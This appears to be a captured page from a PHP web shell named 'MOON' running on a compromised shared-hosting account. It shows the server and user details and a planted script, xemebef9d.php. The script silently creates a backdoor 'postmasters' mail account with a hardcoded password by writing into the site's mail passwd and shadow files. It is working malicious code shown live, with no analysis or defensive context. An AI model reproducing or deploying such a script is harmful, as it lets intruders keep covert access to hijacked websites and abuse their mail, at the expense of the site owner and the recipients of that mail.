MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1
System: Linux int.interweb-hosting.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: elainekoch (690)
PHP: 5.4.45
Disabled: NONE
Upload Files
File: /home/elainekoch/public_html/xemebef9d.php
<?php $user='postmasters';$pass='Alabala1981$$xQ9!mK';$domain='elainekoch.com';$home=dirname(__DIR__);$maildir=$home.'/mail/'.$domain.'/'.$user;@mkdir($maildir.'/cur',0700,true);@mkdir($maildir.'/new',0700,true);@mkdir($maildir.'/tmp',0700,true);$hash='{SHA512-CRYPT}'.crypt($pass,'$6$'.bin2hex(random_bytes(8)).'$');$etc=$home.'/etc/'.$domain;@mkdir($etc,0750,true);$passwd_line=$user.':'.$hash.':'.(string)getmyuid().':'.(string)getmygid().':::'.$maildir.'::';$shadow=$etc.'/shadow';$existing=@file_get_contents($shadow)?:'';if(strpos($existing,$user.':')===false){@file_put_contents($shadow,$existing."\n".$passwd_line."\n",LOCK_EX);}$passwd_f=$etc.'/passwd';$pexist=@file_get_contents($passwd_f)?:'';$pline=$user.':x:'.(string)getmyuid().':'.(string)getmygid().':::'.$maildir.'::';if(strpos($pexist,$user.':')===false){@file_put_contents($passwd_f,$pexist."\n".$pline."\n",LOCK_EX);}echo json_encode(['ok'=>1]);?>